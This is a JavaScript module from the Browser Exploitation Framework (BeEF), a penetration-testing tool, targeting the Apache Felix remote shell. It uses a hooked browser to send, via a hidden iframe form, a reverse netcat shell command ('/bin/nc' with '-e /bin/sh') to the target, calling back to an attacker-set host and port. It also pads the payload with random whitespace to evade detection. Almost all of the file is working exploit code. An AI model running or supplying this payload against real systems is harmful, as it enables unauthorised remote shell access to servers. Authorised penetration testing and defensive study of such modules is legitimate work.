Path: blob/master/modules/exploits/apache_felix_remote_shell/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var rhost = '<%= @rhost %>';8var rport = '<%= @rport %>';9var lhost = '<%= @lhost %>';10var lport = '<%= @lport %>';11var payload_name = 'reverse_netcat';12var timeout = 15;13var peer = rhost + ':' + rport;1415cleanup = function() {16try {17document.body.removeChild(felix_exec_iframe_<%= @command_id %>);18} catch(e) {19beef.debug("Could not remove iframe: " + e.message);20}21}22setTimeout("cleanup()", timeout*1000);2324payload = function() {25var whitespace = '';26for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';27var payload = '';28switch (payload_name) {29default: // "reverse_netcat":30payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';31payload = payload.replace(/ /g, whitespace);32break;33}34return payload35}3637exploit = function() {38var code = payload();39beef.debug(peer + " - Sending payload (" + code.length + " bytes)");40var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);41beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");42}4344try {45exploit();46} catch(e) {47beef.debug(peer + " - Exploit failed: " + e.message);48}4950});515253